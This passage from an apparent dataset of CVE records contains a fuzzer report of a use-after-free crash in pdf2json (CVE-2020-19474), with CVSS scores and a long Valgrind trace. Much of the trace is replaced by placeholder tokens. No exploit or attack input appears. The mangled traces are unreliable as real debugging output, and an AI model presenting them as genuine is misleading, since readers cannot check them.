bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Floating point exception ~~~ Thanks, Manh Dung",
  51489. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51490. "severity": "MEDIUM",
  51491. "baseScore": 5.5,
  51492. "impactScore": 3.6,
  51493. "exploitabilityScore": 1.8
  51494. },
  51495. {
  51496. "CVE_ID": "CVE-2020-19474",
  51497. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/35",
  51498. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/35",
  51499. "Repo_new": "flexpaper/pdf2json",
  51500. "Issue_Created_At": "2019-05-29T15:08:20Z",
  51501. "description": "SEGV (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD5: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FB: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete ](void ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in 